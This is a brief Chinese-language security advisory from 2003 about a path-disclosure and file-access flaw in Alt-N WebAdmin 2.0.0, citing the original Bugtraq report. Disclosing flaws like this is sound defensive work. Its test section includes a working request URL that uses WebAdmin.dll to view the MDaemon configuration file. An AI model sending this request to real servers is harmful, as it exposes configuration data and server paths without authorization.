Alt-N WebAdmin远程信息泄露发布时间:2003-05-25 更新时间:2003-05-25 严重程度:低 威胁程度:服务器信息泄露 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:7439 受影响系统 Alt-N WebAdmin 2.0 .0详细描述 WebAdmin实现上存在漏洞,远程攻击者通过提交某些请求可以得到某些软件的安装目录信息,这些敏感信息可能有助于攻击者进一步攻击系统。 测试代码 http://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\MDaemon\App&File:Name=MDAEMON.INI&View=EditFile 解决方案 厂商还未提供解决方案。 相关信息 A. P閞ez <david@kamborio.net> Path disclosure and file access on WebAdmin http://online.securityfocus.com/archive/1/319735 |
